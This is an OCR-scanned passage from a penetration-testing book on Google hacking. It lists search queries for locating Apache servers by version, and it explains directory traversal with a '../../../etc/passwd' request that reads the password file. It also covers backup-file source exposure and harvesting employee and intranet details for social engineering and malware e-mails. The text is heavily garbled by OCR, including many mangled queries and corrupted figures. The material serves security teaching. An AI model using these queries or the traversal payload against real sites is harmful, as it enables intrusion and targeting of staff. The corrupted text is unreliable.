Apache Versions Queries That Locate Apache Versions Through Directory Listings "Apache/1.0" intitle: index.of "Apache/1.1 " intitle: index.of "Apache/1.2" intitle: index.of "Apache/1 .2.0 server at" intitle: index.of "Apache/1 .2.4 server at" intitle: index.of "Apache/1 .2.6 server at" intitle: index.of "Apache/1 .3.0 server at" intitle: index.of "Apache/1 .3.2 server at" intitle: index.of "Apache/1.3. 1 server at" intitle: index.of www. syngress.com 106 Chapter 3 • Google Hacking Basics "Apache/1.3. 1. 1 server at" intitle:index.of "Apache/1 .3.3 server at" intitle: index. of "Apache/1.3.4 server at" intitle: index.of "Apache/1 .3.6 server at" intitle: index.of "Apache/1.3.9 server at" intitle: index.of Apache/ 1 3 1 1 server at intitle index.of Apache/ 1 3 12 server at intitle index.of Apache/ 1 3 14 server at intitle index.of Apache/ 1 3 1 7 server at" intitle ■index.of Apache/ 1 3 19 server at" intitle ■index.of Apache/ 1 3 20 server at" intitle ■index.of Apache/ 1 22 server at" intitle ■index.of Apache/ 1 23 server at" intitle ■index.of Apache/ 1 24 server at" intitle ■index.of Apache/ 1 3 26 server at" intitle ■index.of Apache/ 1 27 server at" intitle ■index.of Apache/ 1 27-fil" intitle. index.of Apache/ 1 28 server at" intitle ■index.of Apache/ 1 J5 29 server at" intitle ■index.of Apache/ 1 3 31 server at" intitle ■index.of Apache/ 1 35 server at" intitle ■index.of Apache/2 0 32 server at" intitle ■index.of Apache/Z 0 35 server at" intitle ■index.of Apache/2 0 36 server at" intitle ■index.of Apache/2 0 39 server at" intitle ■index.of Apache/2 0 40 server at" intitle ■index.of "Apache/2 0 42 server at" intitle ■index.of "Apache/2 0 43 server at" intitle ■index.of "Apache/2 0 44 server at" intitle ■index.of "Apache/2 0 45 server at" intitle ■index.of "Apache/2 0 46 server at" intitle ■index.of "Apache/2 0 47 server at" intitle ■index.of "Apache/2 0 48 server at" intitle ■index.of "Apache/2 0 49 server at" intitle ■index.of www. syngress.com Google Hacking Basics • Chapter 3 107 "Apache/2. 0.49a server at" intitle:index.of "Apache/2.0.50 server at" intitleiindex.of "Apache/2.0.51 server at" intitle:index.of "Apache/2.0.52 server at" intitle: index. of In addition to identifying the Web server version, it is also possible to deter- mine the operating system of the server (as well as modules and other software that is installed). We'U look at more specific techniques to accomplish this later, but the server versioning technique we've just looked at can be extended by including more details in our query. Table 3.2 shows queries that located extremely esoteric server software combinations, revealed by server tags. These tags list a great deal of information about the servers they were found on and are shining examples proving that even a seemingly small information leak can sometimes explode out of control, revealing more information than expected. Table 3.2 Locating Specific and Esoteric Server Versions Queries That Locate Specific and Esoteric Server Versions "Apache/1.3. 12 (Unix) modJastcgi/2.2. 12 mod_dyntag/1 .0 mod_advert/1 . 12 mod Czech/ 3. 1. 1b2" intitle: index.of "Apache/1.3.12 (Unix) modJastcgi/2.2.4 secu red by Raven/ 1 .5.0" intitle: index.of "Apache/ 1.3. 12 (Unix) mod_ssl/2.6.6 OpenSSL/0.9.5a" intitle:index.of "Apache/ 1.3. 12 Cobalt (Unix) Resin/ 2. 0.5 StoreSense-Bridge/1 .3 ApacheJSen// 1.1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod auth jjam/I.Oa FrontPage/4.0.4.3 mod _perl/1.24" intitle: index.of "Apache/1.3. 14 - PHP4.02 - Iprotect 1.6 CWIE (Unix) mod_fastcgi/2.2. 12 PHP/4. 0.3pl1 " intitle : index, of "Apache/ 1.3. 14 Ben-SSL/1.41 (Unix) mod Jhrottle/ 2.1 1 mod _perl/1 .24_01 PHP/4.0. 3pl1 FrontPage/4.0.4.3 rus/PL30.0" intitle: index.of "Apache/1.3.20 (Win32)" intitle: index.of "Apache/1.3.20 Sun Cobalt (Unix) PHP/4.0. 3pl1 modauth _pam external /O.I FrontPage/4.0.4.3 mod _perl/1.25" intitle: index.of "Apache/1 .3.20 Sun Cobalt (Unix) PHP/4.0.4 mod auth _pam_external/0.1 FrontPage/4.0.4.3 mod_ssl/2.8.4 OpenSSL/0.9.6b mod _perl/1.25" intitle: index.of "Apache/1.3.20 Sun Cobalt (Unix) PHP/4.0.6 mod_ssl/2.8.4 OpenSSL/0.9.6 FrontPage/5.0.2.2510 mod _perl/1 .26" intitle:index.of Continued www. syngress.com 108 Chapter 3 • Google Hacking Basics Table 3.2 Locating Specific and Esoteric Server Versions Queries That Locate Specific and Esoteric Server Versions "Apache/ 1.3. 20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0. 3 pll mod auth _pann_extemal/0.1 FrontPage/4.0.4.3 mod _perl/1.25" intitle:index.of "Apache/ 1.3. 20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4. 0.3 pll mod_fastcgi/2.2.8 mod auth jDam_external/0.1 mod j:)erl/1.25" intitleiindex.of "Apache/ 1.3. 20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.4 mod auth jDam_external/0. 1 mod j)erl/1.25" intitleiindex.of "Apache/ 1.3. 20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.6 mod auth _pam_external/0.1 FrontPage/4.0.4.3 mod _perl/1.25" intitleiindex.of "Apache/ 1.3. 20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b mod auth j:)am_external/0.1 mod joerl/l .25" intitleiindex.of "Apache/ 1.3. 26 (Unix) Debian GNU/Linux PHP/4. 1.2 mod dtcl" intitleiindex.of "Apache/ 1.3. 26 (Unix) PHP/4.2.2" intitleiindex.of "Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6b" intitleiindex.of "Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.7" intitleiindex.of "Apache/ 1.3.26+PH" intitle i index, of "Apache/ 1.3. 2 7 (Dam/in)" intitleiindex.of "Apache/ 1.3. 27 (Unix) mod_log_bytes/1 .2 mod_bwlimited/1 .0 PHP/4.3.1 FrontPage/5.0.2.2510 mod_ssl/2.8. 12 OpenSSL/0.9.6b" intitleiindex.of "Apache/1.3.27 (Unix) mod_ssl/2.8.1 1 OpenSSL/0.9.6g FrontPage/5.0.2.2510 mod _gzip/1.3.26 PHP/4. 1.2 mod_throttle/3. 1.2" intitleiindex.of Going Out on a Limb: Traversal Techniques The next technique we'll examine is known as traversal. Traversal in this context simply means to travel across. Attackers use traversal techniques to expand a small "foothold" into a larger compromise. www. syngress.com Google Hacking Basics • Chapter 3 109 Directory Traversal To illustrate how traversal might be helpful, consider a directory Hsting that was found with intitlenndex.of inurl: "/admin/*", as shown in Figure 3.16. Figure 3.16 Traversal Example Found with index.of Index of /bpa/acadurits/admin/envr/bowman/ 1 ^ ^ 1 1 C 1 0http://wwwadmin,cl.uh,edu/bpa/a<:adunits/admiri/envr/bowmari/ " Or inurl:"/admin/*" intitleiindex.of^j Index of /bpa/acadunits/admin/envr/bowman/ Mame Last modified Size Description Q Parent Directory D WS FTP. LOG bowman courses. htm 02-Jan-02 13; 50 7K 02-Jan-02 13;50 6K [Ml bownifln i nd^^x . h+-,Tn 02-Jan-02 13;50 IK [^ bQwman_intro . htm 09-Oct-02 15; 58 5K [Ml bownan_iiiieDU . htm 02-Jan-02 13;50 IK In this example, our query brings us to a relative URL of /bpa/acadunits/admin/envr/bowman. If you look closely at the URL, you'U notice an "admin" directory two directory levels above our current location. If we were to click the "parent directory" link, we would be taken up one direc- tory, to the "envr" directory. Clicking the "parent directory" link from the "envr" directory would take us to the "admin" directory, a potentially juicy directory. This is very basic directory traversal. We could explore each and every parent directory and each of the subdirectories, looking for juicy stuff. Alternatively, we could use a creative site search combined with an inurl search to locate a specific file or term inside a specific subdirectory, such as sitexl. uh.edu inurhbpa/acadunits /admin ws^tp.log, for example. We could also explore this direc- tory structure by modifying the URL in the address bar. Regardless of how we were to "walk" the directory tree, we would be traversing outside the Google search, wandering around on the target Web server. This is basic traversal, specifically directory traversal. Another simple example would be replacing the word admin with the word student or Another more serious traversal technique could allow an attacker to take advantage of software flaws to traverse to directories outside the Web server directory tree. For www. syngress.com 110 Chapter 3 • Google Hacking Basics example, if a Web server is installed in the /var/www directory, and public Web documents are placed in /var/www/htdocs, by default any user attaching to the Web server's top-level directory is really viewing fdes located in /var/www/htdocs. Under normal circumstances, the Web server will not allow Web users to view files above the /var/www/htdocs directory. Now, let's say a poorly coded third-party software product is installed on the server that accepts directory names as arguments. A normal URL used by this product might be www.somesadsite.org/badcode. pl?page=/index.html. This URL would instruct the badcode.pl program to "fetch" the file located at /var/www/htdocs/index.html and display it to the user, perhaps with a nifty header and footer attached. An attacker might attempt to take advantage of this type of program by sending a URL such as www.somesadsite.org/ badcode.pl?page=../../../etc/passwd. If the badcode.pl program is vulnerable to a directory traversal attack, it would break out of the /var/www/htdocs directory, crawl up to the real root directory of the server, dive down into the /etc directory, and "fetch" the system password file, displaying it to the user with a nifty header and footer attached! Automated tools can do a much better job of locating these types of files and vulnerabilities, if you don't mind all the noise they create. If you're a pro- grammer, you wiU be very interested in the Libwhisker Perl library, written and maintained by Rain Forest Puppy (RFP) and available from www.wiretrip. net/rfp. Security Focus wrote a great article on using Libwhisker. That article is available from www.securityfocus.com/infocus/1798. If you aren't a programmer, RFP's Whisker tool, also available from the Wiretrip site, is excellent, as are other tools based on Libwhisker, such as nikto, written by sullo@cirt.net, which is said to be updated even more than the Whisker program itself. Incremental Substitution Another technique similar to traversal is incremental substitution. This technique involves replacing numbers in a URL in an attempt to find directories or files that are hidden, or unlinked from other pages. Remember that Google generally only locates files that are Unked from other pages, so if it's not Unked, Google won't find it. (Okay, there's an exception to every rule. See the FAQ at the end of this chapter.) As a simple example, consider a document called exhc-l.xls, found with Google. You could easily modify the URL for that document, changing the 1 to a 2, making the filename exhc-2.xls. If the document is found, you have successfully used the incremental substitution technique! In some cases it might be simpler to www. syngress.com Google Hacking Basics • Chapter 3 111 use a Google query to find other similar files on the site, but remember, not all files on the Web are in Google's databases. Use this technique only when you're sure a simple query modification won't find the files first. This technique does not apply only to filenames but just about anything that contains a number in a URL, even parameters to scripts. Using this technique to toy with parameters to scripts is beyond the scope of this book, but if you're interested in trying your hand at some simple file or directory substitutions, scare up some test sites with queries such asfiletYpe:xb inurh.i.xls or intitle: index. of inurhOOOl or even an images search for IJpg. Now use substitution to try to modify the numbers in the URL to locate other files or directories that exist on the site. Here are some examples: ■ /docs/bulletin/2.xls could be modified to /docs/bulletin/2.xls ■ /DigLib_thumbnail/spmg/hel/0001/H/ could be changed to /DigLib_thumbnail/spmg/hel/0002/H/ ■ /gallery/ wel008-l.jpg could be modified to /gallery/ wel008-2.jpg Extension Walking We've already discussed fde extensions and how the filetype operator can be used to locate fries with specific fde extensions. For example, we could easily search for HTM files with a query such as filetype: HTM HTM. (Remember that filetype searches require a search parameter. Files ending in HTM always have HTM in the URL!) Once you've located HTM fries, you could apply the substitution technique to find files with the same file name and different extension. For example, if you found /docs/index. htm, you could modify the URL to /docs/index.asp to try to locate an index.asp file in the docs directory. If this seems somewhat pointless, rest assured, this is, in fact, rather pointless. We can, however, make more intelligent substitutions. Consider the directory listing shown in Figure 3. 17. This listing shows evidence of a very common practice, the creation of backup copies of Web pages. www. syngress.com 112 Chapter 3 • Google Hacking Basics Figure 3.17 Backup Copies of Web Pages are Very Common Index of /englisW till Parent Directory tl index. IQ31 i i ndex ■ htm lid index . htm, bah: tl index. htm 0^0119 indexl . htm ndex 1 ■ htm . bak indexlO . htm LEI indexlO . htm, bak indexll . htm indexl 1 . htm . bak de>:12 ■ htm indexl2 ■ htm. bak Last modified Size Description OS-Jan- 19-Jan- 09-Jan- 19-Jan- 01-Hov- 09-Jan- 09- Jan- 09-Jan- 09-Jan- 09-Jan- 09-Jan- 09-Jan- 02 20:57 04 19:21 02 I9:a0 04 19:1S 02 09:SS 02 19:30 02 19:30 02 19:30 02 19:30 02 19:30 02 19:30 02 19:30 IK IK IK IK IK IK IK IK IK IK IK IK I Backup files can be a very interesting find from a security perspective. In some cases, backup files are older versions of an original fUe. This is evidenced in Figure 3. 17. Take a look at the date of the index.htm fde.The date is listed as January 19, 2004. Now take a look at the backup copy, index.htm.bak. That fde's date is listed as January 9, 2002. Without even viewing these fdes, we can tell that they are most likely very different, since there are more than two years' difference in the dates. Older files are not necessarily less secure than newer versions, but backup files on the Web have an interesting side effect: They have a tendency to reveal source code. Source code of a Web page is quite a find for a security prac- titioner because it can contain behind-the-scenes information about the author, the code creation and revision process, authentication information, and more. To see this concept in action, consider the directory listing shown in Figure 3.17. Clicking the link for index.htm will display that page in your browser with all the associated graphics and text, just as the author of the page intended. This happens because the Web server follows a set of rules about how to display types of files to the user. HTML files are sent as is to your browser, with very www. syngress.com Google Hacking Basics • Chapter 3 113 little modification (actually there are some exceptions, such as server-side includes) . When you view an HTML page in your browser, you can simply per- form a view source to see the source code of the page. PHP files, by contrast, are first executed on the server. The results of that exe- cuted program are then sent to your browser in the form of HTML code, which your browser then displays. Performing a vieu^ source on HTML code that was generated from a PHP script vfill not show you the PHP source code, only the HTML. It is not possible to view the actual PHP source code unless something somewhere is misconfigured. An example of such a misconfiguration would be copying the PHP code to a filename that ends in something other than PHP, like BAK. Most Web servers do not understand what a BAK file is. Those servers, then, will display a PHP.BAK file as text. When this happens, the actual PHP source code is displayed as text in your browser. As shown in Figure 3.18, PHP source code can be quite revealing, showing things like SQL queries that list information about the structure of the SQL database that is used to store the Web server's data. Figure 3.18 Backup Files Expose SQL Data o o o http://&arn.org/jogger/index.php.bak http://sarn.org/jogger/index.php.[)ak Qr inurliindey. 1 php.bak QSM <3 require ( "inc/ common .inc.php" ) ; i£(!$j<;g) { $jog - 1; ) else { $jog = sprintf ( ''^d^'j $jog)J > Sentries_3ql = my sql_query [" SELECT users. jidj DATE_F03iMAT( entries, date, ' %W %mi'%d/%y i %h:%i:%s AS date, entries . sub ject, entries . body , users. status FROM entries, users WBERE (entries. jid = users. jid HJD entries . j ogid = $jog) ORDER BV id DESC LIMIT 15") J echo mys I I e I Elhttp;^/216.i39.41,104/seaKh?q=cactie;MSl - Cl- These search terms have been highlighted: index of index php index php b>ak Index of / Parent Eirecbory private/ ^3 vti bin/ _vti_gnf / ^ _vti_lQq/ vti fcxt/ cqi-bin/ f avicon . ico images/' index . html . bak ladfiK. pbp. bak 1^ indexl ■ php .bak Last madified Size Deacriptipn D9-Sep-2D04 I&:35 16-Jiil-2004 20:20 l6-Jkil-2004 20:20 l6-Jul-2004 20:20 l6-Jul-2004 20:20 l6-Jul-2004 20:20 l6-Jul-2004 20:20 2 1-Jul-2(I04 21:59 07-Sep-2004 0S:27 06- Sep-2004 0&:56 09-Sep-2004 03:55 07- Sep-2004 03:27 09-Sep-2004 14:47 kubrick-searchf Qcm. php 05-Sep-2004 1S;D6 Ifik 4k Ik I Directory listings also provide insight into the file extensions that are in use in other places on the site. If a system administrator or Web authoring program creates backup files with a .BAK extension in one directory, there's a good chance that BAK files will exist in other directories as well. www. syngress.com Google Hacking Basics • Ciiapter 3 11 Summary The Google cache is a powerful tool in the hands of the advanced user. It can be used to locate old versions of pages that may expose information that normally would be unavailable to the casual user. The cache can be used to highlight terms in the cached version of a page, even if the terms were not used as part of the query to find that page. The cache can also be used to view a Web page anony- mously via the &strip=i URL parameter, and it can even be used as a transparent proxy server with creative use of the translation service. An advanced Google user wiU always pay careful attention to the details contained in the cached page's header, since there can be important information about the date the page was crawled, the terms that were found in the search, whether the cached page con- tains external images, links to the original page, and the text of the URL used to access the cached version of the page. Directory Hstings, although somewhat uncommon contain a great deal of information that are interesting from a security perspective. In this chapter, we saw that directory listings can be used to locate specific files and directories and that directory listings can be used to determine specific information about the software installed on a server. Traversal techniques can be used to locate informa- tion often outside the piercing gaze of Google's crawlers. Some specific tech- niques we explored included directory traversal, incremental substitution, and extension walking. When combined with effective Google searching, these tech- niques can often unearth all sorts of information that Google searching alone can not reveal. In addition, some traversal techniques can be used to actually compro- mise a server, giving an attacker wide-open access to a server. Solutions Fast Track Anonymity with Caches 0 Clicking the cache link wiU not only load the page from Google's database, it wiU also connect to the real server to access graphics and other non-HTML content. 0 Adding &strip=l to the end of a cached URL wiU only show the HTML of a cached page. Accessing a cached page in this way wiU not connect to the real server on the Web and could protect your anonymity if you use the cut and paste method shown in this chapter. www. syngress.com 116 Chapter 3 • Google Hacking Basics Using Google as a Proxy Server 0 Google can be used as a transparent proxy server, thanks to the transla- tion service. 0 This technique requires URL modification, specifically the modification of the langpair parameter. To use this technique, set the langpair values to the same language, such as langpair=en%7Cen. Locating Directory Listings 0 Directory Hstings contain a great deal of invaluable information. 0 The best way to home in on pages that contain directory Hstings is with a query such as intitle:index.of "parent directory" or intitle:index.of name size. Locating Specific Directories in a Listing 0 You can easily locate specific directories in a directory listing by adding a directory name to an index, of search. For example, intitle:index.of inurlibackup could be used to find directory listings that have the word backup in the URL. If the word backup is in the URL, there's a good chance it's a directory name. Locating Specific Files in a Directory Listing 0 You can find specific files in a directory Hsting by simply adding the filename to an index. of query, such as intitle:index .of ws^tp.log. Server Versioning with Directory Listings 0 Some servers, specifically Apache and Apache derivatives, add a server tag to the bottom of a directory listing. These server tags can be located by extending an index, of search, focusing on the phrase server at — for example, intitleiindex .of serverat. 0 You can find specific versions of a Web server by extending this search with more information from a correctly formatted server tag. For example, the query intitlenndex.of serverat "Apache Tomcat/" will locate www. syngress.com Google Hacking Basics • Ciiapter 3 servers running various versions of the Apache Tomcat server. Directory Traversal 0 Once you have located a specific directory on a target Web server, you can use this technique to locate other directories or subdirectories. 0 An easy way to accompHsh this task is via directory Hstings. Simply cHck the parent directory link, taking you to the directory above the current directory. If this directory contains another directory listing, you can simply click links from that page to explore other directories. If the parent directory does not display a directory listing, you might have to resort to a more difficult method, guessing directory names and adding them to the end of the parent directory's URL. Alternatively, consider using site and inurl keywords in a Google search. Incremental substitution 0 Incremental substitution is a fancy way of saying "take one number and replace it with the next higher or lower number." 0 This technique can be used to explore a site that uses numbers in direc- tory or filenames. Simply replace the number with the next higher or lower number, taking care to keep the rest of the file or directory name identical (watch those zeroes!). Alternatively, consider using site with either inurl orjiletype keywords in a creative Google search. Extension Walking 0 This technique can help locate files (for example, backup files) that have the same filename with a different extension. 0 The easiest way to perform extension walking is by replacing one extension with another in a URL — replacing html with bak, for example. 0 Directory listings, especially cached directory listings, are easy ways to determine whether backup files exist and what kinds of fde extensions might be used on the rest of the site. www. syngress.com Chapter 3 • Google Hacking Basics Links to Sites ■ www.all-nettools.com/pr.htm A simple proxy checker that can help you test a proxy server you're using. Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com. Ql Can Google find Web pages that aren't linked fi-om anywhere else on the Web? A: This question requires two answers. The first answer is "Yes." Anyone can add a URL to Google's database by filling out the form at www.google.com/ addurl.html. The second answer is "Maybe" and requires a bit of explanation. . The Opera Web browser includes a feature that sends data to Google when a user types a URL into the address bar. The entered URL is sent to Google, and that URL is siicftquently crawled by Google's bots. According to the FAQ posted at wwvftperajcom/ adsupport: The Google system serves advertisements and related searches to the Opera browser th rou n K thp. Q npra bro wser ba nner 468x60 format. Google determinejpvhat^s andj^Iate^garches are rele- vant based on the URL and content of the page you are viewing and your IP address, which are sent to Gaogle via the Opera browser. m ' There is no substantial evidence that proves th^Google includes this link in its search engine. However, testing shows that wIict^ previously unin- dexed URL (http://johnny.ihackstuff.com/temp/suck.html) is entered into Opera 7.2.3, a Googlebot crawls that URL moments later, as shown by the following log excerpts: 64.68.87.41 - "GET /robots. txt HTTP/1.0" 200 220 "-" "Mediapartners- Google/2 . 1 (+http : / /www. googlebot . com/bot .html) " 64.68.87.41 - "GET /temp/ suck. html HTTP/1.0" 200 5 "-" "Mediapartners- Google/2 . 1 ( +http : / /www. googlebot . com/bot .html) " Google Hacking Basics • Chapter 3 Opera users should not expect typed URLs to remain "unexplored." Q: I use Opera. Can I turn off the Google crawling feature? Al Yes. This feature can be turned off within Opera by selecting Show generic selection of graphical ads from File | Preferences | Advertising. Q: Searching for backup files seems cumbersome. Is there a better way? Al Better, meaning faster, yes. Many automated Web tools (such as Web Inspect from www.spidynamics.com) offer the capability to query a server for varia- tions of existing filenames, turning an existing index.html file into queries for index.html.bak or index.bak, for example. These scans are generally very thorough but very noisy and will almost certainly alert the site that you're scanning. Weblnspect is better suited for this task than Google Hacking, but many times a low-profile Google scan can be used to get a feel for the secu- rity of a site without alerting the site's administrators or intrusion detection system (IDS). As an added benefit, any information gathered with Google can be reused later in an assessment. Ql Backup files seem to create security problems, but these files help in the development of a site and provide peace of mind that changes can be rolled back. Isn't there some way to keep backup files around without the undue risk? A: Yes. A major problem with backup files is that in most cases, the Web server displays them differently because they have a different file extension. So there are a few options. First, if you create backup files, keep the extensions the same. Don't copy index.php to index.bak but rather to something like index.bak.php. This way the server still knows it's a PHP file. Second, you could keep your backup files out of the Web directories. Keep them in a place you can access them but where Web visitors can't get to them. The third (and best) option is to use a real configuration management system. Consider using a CVS-style system that allows you to register and check out source code. This way you can always roll back to an older version, and you don't have to worry about backup files sitting around. www. syngress.com Chapt Pre-Assessment Solutions in this Chapter i The Birds and the Bees Walks on the Romantic C List of Sites ' " '0 Summary 0 Solutions Fast^rack 0 Frequently Asked Questions 1 22 Chapter 4 • Pre-Assessment Introduction In this chapter, we'll discuss what's called pre-assessment information-gathering techniques. During this phase of an assessment, the security tester is most inter- ested in obtaining preliminary information about the target. This does not include specific information such as IP addresses and DNS names (which we dis- cuss in the next chapter) but rather information that could be used for social manipulation (talking a help desk operator into a password change), physical compromise of a target (gaining information about building structures or badge layouts), and general reconnaissance. Throughout this chapter, we focus on methods to locate information about the target that wiU most likely be used in later phases of the assessment. In a twisted sort of way, pre-assessment work is a bit like preparing for the perfect date. You might do a bit of research about the person, get some information about them and their friends and family, spend quality time with them, and learn as much as you can about their interests. Although the stakes are much higher, courting your target can be like courting your mate. When things get rough, plan to spend some time sleeping in a chair or a couch instead of in a nice, warm bed where you belong! Let's carry that analogy through the chapter and examine how the stages of pre-assessment mirror the stages of courtship. The Birds and the Bees One of the first steps you need to take is to try to understand the target com- pany structure and environment. Visiting the company Web site can provide some information, but keep in mind that you're only seeing what they want you to see. To get behind the scenes, a simple 5/Ye.'somecompany. com search wiU often reveal information that wasn't meant to be seen by the public. This search has one major drawback, however: for a large company, it could return thousands of results, many of which are useless and a huge waste of your time. In this section we look at techniques (grinding techniques, specifically) that you can use to weed through aU this data, but for now it might be a better idea to target your searches to find the useful data. www. syngress.com Pre-Assessment • Chapter 4 123 Intranets and Human Resources where do you go if you want the inside scoop on a company? What better department to start with than Human Resources! Since just about anything intentionally viewable by the public tends to be watered down, we'U need to get behind the scenes. Many companies like to make company information available to their employees (and only their employees), and to do so they set up company intranets containing information for employee eyes only. Intranets are supposed to be private, but combining Human Resources and intranet into a search such as intitle -.intranet inurhintranet +intext: "human resources" shows that private sites some- times aren't exactly private, as we can see in Figure 4.1. Figure 4.1 Human Resources Intranet Pages O O O Google Search: intitleiintranet inurLintranet +intext:"human resources'' \ M \ C I O http://www.google.com/searcl ~ intitle:intranet inurl:intranet +inte)tt:"human resources" Gougle Web Images Groups News Froools m&re » intitle:intranetirurl:inlranet Tintexl:"human reso'urce i'' Search ■ Web Results 1 - 10 of about 3,130 for intitle:! ntranet inurhintranet -t-intext:" human r&SDurces*^ (D.4G seconds) Google Directory - Computers > Software > Intranet ... directories, and other human resources data graphically via web browser. Digger Solutions - httpiyywww.diggersolutions.com Open source ASP intranet solutions. ... directory. google.comyTopyCompuLersySoftwareyintranety - I9k - Cached - Similar pages University of Illinois Extension Intranet Extemal Websites Select... U of I Extension Urban Programs Illinois 4-H Fanndoc En Espanoi. Regional Intranets Select... East Central ... web.extension_uluc.eduyintranef intranet. cfm?s=hr - 4Dk - Cached - Similar pages Intranet: Office of Human Resources Welcome to the Extension Human Resources Intranet Page! Your team of dedicated Mountaineers is here to provide you the highest quality ... intranet.ext.wyu.6duyorgsupyohry - Sk - Cached - Similar pages Intranet atSlUC ... Salukinet SlUC Intranet Athletics Public Events Calendar Weatlier Search SlUC. ... Human Resources supports Civil Service and Faculty/AP staff, provides job listings ... intranetsiu.eduy - 22k - Cached - Similar pages In addition to providing you with information about the company policies and procedures, most HR intranet sites provide the names of contact people for the department. These names can be very useful for future social engineering attacks. www.syngress.com Chapter 4 • Pre-Assessment Underground Googling... A Wealth of Information Lies in the Company Intranet Don't limit yourself to the Human Resources department. Companies put all sorts of information on their intranets, since they assume they are safe from public eyes. Replacing the human resources part of the query with computer services, IT department, or simply phone can provide amazing amounts of additional information that you can later use during the social engineering phase. Chapter 7 contains more information about using the company intranet to your advantage. Help Desks A simple search listed in Chapter 7'sTop 10 searches is intranet \ help.desli, or simply ("lielp.desii" \ helpdesk). Combined with the site operator, this query is designed to locate intranets or help desk pages. Help desk references are extremely valuable because they often refer to documents and procedures an attacker could use to gather information about the target. Self-Help and "How-To" Guides These documents are designed to help an end user perform some sort of proce- dure. Used creatively, they can provide information about the target that could prove useful at some point during an assessment. For example, a kludgey search such as "Plow to" network setup dhcp ( "help desk" | helpdesk ) can reveal documents that include instructions for connecting to a network, as shown in Figure 4.2. Pre-Assessment • Chapter 4 125 Figure 4.2 "How-To" Documents Are Revealing Q 0 Networking Guide: Macintosh (MacOS S.x-9.x) Networking Guide : //labs. 5 " Q' "how to" network setup dhcp ( "help desk" | helpdesk) Q) 3. Canflgur« your network settings. Go to the 'Apple Menu' ttop-left -corner of the screen), then go to 'Control Panels', and then go to 'TCP/IP'. You will need to change this Info to this; Connect via; Ethernet Configure; DHCP Server Leave 'DHCP Client ID;' empty Close the TCP/IP Settings window and Save. Co back to the 'Apple Menu', to 'Control Panels', and open 'Appletalk'. Make sure 'Connect via;' Is Etheniet. If It Is r»Dt, change this to 'Ethernet', and Close and Save these settings. 4. Does It work? Ptow your liternet access should work. Confirm thils by opening Netscape Communicator, internet Explorer, or another internet application. If yoa don't have any of these Installed on your computer (chances are you already have them), go to our Download page, download a web browser, and Install It. Either It works or It daesnt. If you are still having difficulties, call the Help Desk at xJ70S, and either they can assist you over the phone, or they can delegate an FlCC to yojr dorrr room. L Sb nd Ing / RflCfl Ivln g «Mall Santa Clara provides Its students with eMail accounts. eMail accounts are distributed during the orientation session before school starts. If you missed this, or for some reason weren't assigned an eMail address, visit Information Technology. Croupwise eMail Is accessible via a website, the rtovell Groupwise client, or through a regular eMail POPi client such as Microsoft Outlook, Netscape Communicator, Eudora, and so on. The recommended way of viewing and sending eMail Is either through the website, or with the P4ovell Qroupwise client. Havell Groupwlse Website The website provides the most simple way of using eMail. This website Is available at http://qw5. .edu/ it Is available from any Internet connected co-mputer, on or off campus. This page lists a virtual gold mine of information: ■ Network information DHCP, No client ID s, Apple Talk, Ethernet. ■ Recommended browsers The download link lists recommended browsers and version information. ■ Help desk phone number XI 705, an RCC comes to your room. ■ E-mail information ID can be generated by the IT department. ■ E-mail information Site uses Novell Group Wise. ■ E-mail information Web-based (!) e-mail server located online at http://gw5.XXX.edu. ■ E-mail information E-mail server is available from the Internet. This in not an uncommon how-to document. Most are overly informative, supplying a great deal of information that an attacker can use. www.syngress.com Chapter 4 • Pre-Assessment Job Listings Job listings can also reveal information about a target, including technologies in use, corporate structure, geography, and more. One of the easiest ways to locate job postings is with a simple query such as resume \ employment combined with the site operator. Don't overlook job listings as an important source of informa- tion about an organization. Underground Googling... Public Polling Via Google Google can be used to map the public opinion of a site over time. First, build two lists of Google queries. The first list combines the common name of a company with 100 common "good" phrases such as good experience, wise investment, well-managed, and so on. Next, create a second list that combines the company name with 100 "bad" phrases such as poor customer service, shady management, and beware. Feed these lists into Google every day for an extended period of time, mapping not only the numbers of hits but the page rank of each referring site. This kind of nonobvious statistical information can speak volumes about a company's image (as well as provide a decent financial investment road map!). Long Walks on the Beach During the courtship process, a couple often spends time getting to know one another. Similarly, during a penetration test, it's not a bad idea to get "personal" with your target, or specifically the people working for the organization. Digging up details about the people who make up an organization can pay off in big ways during later assessment phases. Usernames, employee numbers, or Social Security numbers can be used to social engineer a help desk technician. E-mail addresses can be targeted with e-mails containing malware. Information about an individual's circle of friends can be used to social engineer that individual. Any little tidbit of information can be used by a creative security tester to gain access Pre-Assessment • Chapter 4 127 to more information, causing a snowball effect that often leads to system or net- work compromise. In this section, we'U take a look at some ways Google can be used to harvest this type of information. Names, Names, Names One way Google excels at helping the researcher dig up additional names and e- mail addresses is through its Google Groups searches. Google Groups (formerly DejaNews) is simply a Usenet archive that keeps copies of aU posts made to thousands of Usenet groups over the years. For example, performing a Google Groups search on somecompany.com returns some nice information, as shown in Figure 4.3. Figure 4.3 Results of Google Groups Query for somecompany.com ~\ I <^ I |Cjhttp://group5. google, com/groups?hl=en&lr=&q=5S'50sQme "'Q.- Google Gousk Groups" Groups Web Images Groups News Frooqle more a @so metonnp any. torn Results 1 - 10 of about 1,470 for^somecompany.com. (0.14 seconds) Sorted by relevance Sort by date Related groups: mailina.Dostfix.users mod rewrile with Apache also AulhExpire ... There is an index.html page on the Apache web server accessed via the Internet as say vinAw.e):tranet.5omecom pany.com It will have two links - one to wuvwJntranet ... com D.lanQ.D&rl.moduies - Dec 26, 2002 by John Kirkman - View Thread [1 artlclel Postfix on the DMZ and Aliases ... Exanple: A mall sent to unlxadminsi^somecompany.com should be stopped at the DMZ box, recognized as a virtual user, passed to the alias map, and expanded. ... maliino.Dostflji.users - Sep 26, 2001 by James A. Mutter - View Thread (3 articles) Relaying denied? ... message similarto the following back from 